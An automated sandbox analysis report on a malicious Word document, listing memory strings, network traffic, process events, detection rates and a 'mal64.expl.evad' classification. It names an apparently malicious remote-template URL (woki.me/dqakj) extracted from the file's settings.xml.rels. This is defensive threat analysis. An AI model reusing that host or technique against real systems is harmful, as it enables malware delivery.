Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/profileb2/v2.0/me/V1Profilele
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/recommended/api/v1.0/edgeworthPqg
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory0~
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistorytPrint
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/recommendations
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/recommendedDocuments
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/recommendedDocuments(p
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/searchhistorye/v17p
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/sharingsuggestion
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com_TU
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comhTF
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comyT7
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/client/results?fullframe=yes
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/client/results?fullframe=yesP
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/client/results?fullframe=yesh
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFilevr
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://teams.cloud.microsoft/ups/global//xss
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://teams.cloud.microsoft/ups/global/e
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A51B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://templates.office.com/Search/results?ocid=oo_toc_client_app_MARVEL_UPS_templates_gopremiumLan
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A500000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://templates.office.com/templates-for-excel?ocid=oo_toc_client_app_MARVEL_UPS_templates_gopremi
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D796490000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://templates.office.com/templates-for-powerpoint?ocid=oo_toc_client_app_MARVEL_UPS_templates_go
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A500000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://templates.office.com/templates-for-word?ocid=oo_toc_client_app_MARVEL_UPS_templates_gopremiu
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net
Source: WINWORD.EXE, 00000000.00000002.3014847999.000001D79C8A2000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3014769374.000001D79C735000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/
Source: WINWORD.EXE, 00000000.00000002.3009141410.000001D79C4E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3014847999.000001D79C8A2000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3014847999.000001D79C958000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: WINWORD.EXE, 00000000.00000002.3014847999.000001D79C79C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/bbwe
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/g
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/o
Source: WINWORD.EXE, 00000000.00000002.3013412770.000001D79C518000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/q
Source: WINWORD.EXE, 00000000.00000002.3014847999.000001D79C79C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/tm(
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3009141410.000001D79C09B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/version.json
Source: WINWORD.EXE, 00000000.00000002.3009141410.000001D79C476000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/version.jsonWRS%7b546CFA88-F0EB-480F-AE5B-25
Source: WINWORD.EXE, 00000000.00000002.3009141410.000001D79C09B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/version.jsonY
Source: WINWORD.EXE, 00000000.00000002.3009141410.000001D79C09B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/version.jsonate
Source: WINWORD.EXE, 00000000.00000002.3013412770.000001D79C518000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/version.jsone
Source: WINWORD.EXE, 00000000.00000002.3013412770.000001D79C518000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/version.jsonel
Source: WINWORD.EXE, 00000000.00000002.3009141410.000001D79C454000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/version.jsoney
Source: WINWORD.EXE, 00000000.00000002.3013412770.000001D79C518000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/version.jsonitys
Source: WINWORD.EXE, 00000000.00000002.3014847999.000001D79C8A2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/x
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net0
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A3D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.net:443/mirrored/smartlookup/current/
Source: WINWORD.EXE, 00000000.00000002.3014769374.000001D79C735000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.netathsesbO
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.netnt/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.netnt/n.json$
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.cdn.office.netnte
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/Insights/v2
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmljvT
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.htmlYnl
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://us-partner-integrations.egnyte.com/msoffice/authgate/interceptintegrations-staging.qa-egnyte
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://us-partner-integrations.egnyte.com/msoffice/wopibootstrapper?betad221f797-d1d1-4289-9a6d-d36
Source: WINWORD.EXE, 00000000.00000002.2999370908.000001D7963AF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://useraudit.o365auditrealtimeingestion.manage.office.comry
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://voice.officeapps.live.com/CustomEndpointHandler.ashx
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://web.microsoftstream.com/video/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/lml
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://webshell.suite.office.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://webshell.suite.office.com%s/vgJ
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://webshell.suite.office.comTgh
Source: WINWORD.EXE, 00000000.00000002.3003748925.000001D79BBB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://woki.me
Source: WINWORD.EXE, 00000000.00000002.3009141410.000001D79C506000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003748925.000001D79BBB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://woki.me/
Source: WINWORD.EXE, 00000000.00000002.3009141410.000001D79C4E1000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003578634.000001D79BACC000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003936689.000001D79BD67000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.2997632655.000000C14CAD1000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://woki.me/DQaKj
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003578634.000001D79BACC000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003936689.000001D79BD67000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003494409.000001D79BA32000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://woki.me/DQaKj/
Source: WINWORD.EXE, 00000000.00000002.3009141410.000001D79C4E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://woki.me/DQaKj/Desktop
Source: WINWORD.EXE, 00000000.00000002.3009141410.000001D79C4E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://woki.me/QaKj
Source: WINWORD.EXE, 00000000.00000002.3009141410.000001D79C4E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://woki.me/qakj
Source: WINWORD.EXE, 00000000.00000002.3003748925.000001D79BBB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://woki.me7
Source: WINWORD.EXE, 00000000.00000002.3003748925.000001D79BBB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://woki.meB
Source: WINWORD.EXE, 00000000.00000002.3003748925.000001D79BBB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://woki.meE
Source: WINWORD.EXE, 00000000.00000002.3009141410.000001D79C4E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://woki.meqakj
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wopi.dropbox.com/wopibootstrapperyr8ricy1tm3biywaccount_info.write
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscovery.ashx
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A429000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word-edit.officeapps.live.com/we/rrdiscovery.ashx.DLL
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wordcs.officeapps.live.com/wordauto/wordautomation.svc/wordautomationKvu
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wordcs.officeapps.live.com/wrdps/wordprint.svc/wrdprint
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wus2.pagecontentsync.
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wus2.pagecontentsync.onenote.com/pagecontentsync/attachment/v1nc/attachment/v1Uah
Source: WINWORD.EXE, 00000000.00000002.2998895883.000001D78EFD6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2on
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.box.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/box/logo16.pnghttps:/
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/Dropbox/plus16.pn
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/ow/msft/oauth_callbackwopi.dropbox.comwww.dropbox.comapi.dropbox.comhelp.dro
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.egnyte.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/egnyte/egnyte_logo
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.netdocuments.com/https://p1.aprimocdn.net/netdocuments/ae18ea3e-c3c2-4d5d-9c95-b2190152e
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/8KR
Source: WINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/https://odc.officeapps.live.com/odc/stat/images/sm/officestore_16_2.pnghttps:
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.onenote.com/userinfo/v1/settings/IsFeatureEnabled/PremiumFeatureses
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yammer.com
Source: WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yammer.comf
Source: unknownNetwork traffic detected: HTTP traffic on port 53971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53978
Source: unknownNetwork traffic detected: HTTP traffic on port 53973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53982
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53973
Source: unknownNetwork traffic detected: HTTP traffic on port 53982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53975 -> 443
Source: unknownHTTPS traffic detected: 142.132.211.198:443 -> 192.168.2.24:53971 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.22.242.9:443 -> 192.168.2.24:53985 version: TLS 1.2
Source: WER.bd05f971-1afa-4487-84bf-f1ccec6bff92.tmp.xml.9.drOLE indicator, VBA macros: true
Source: WER.bd05f971-1afa-4487-84bf-f1ccec6bff92.tmp.xml.9.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5956 -s 5408
Source: classification engineClassification label: mal64.expl.evad.winDOC@4/6@2/3
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$R2025-000455.docx.docJump to behavior
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5956
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{F5919772-BDE0-4706-8040-BD6CD116F00F} - OProcSessId.datJump to behavior
Source: NCR2025-000455.docx.docOLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WerFault.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\TenantRestrictions\PayloadJump to behavior
Source: NCR2025-000455.docx.docVirustotal: Detection: 40%
Source: NCR2025-000455.docx.docReversingLabs: Detection: 35%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5956 -s 5408
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5956 -s 5144
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: NCR2025-000455.docx.docInitial sample: OLE zip file path = word/_rels/footer2.xml.rels
Source: NCR2025-000455.docx.docInitial sample: OLE zip file path = word/media/image2.emf
Source: NCR2025-000455.docx.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: NCR2025-000455.docx.docInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Source: settings.xml.relsExtracted files from sample: https://woki.me/dqakj
Source: Amcache.hve.9.drBinary or memory string: bcdedit.exe|ac227fd116781fea
Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\bcdedit.exe
Source: Amcache.hve.9.drBinary or memory string: bcdedit.exe
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
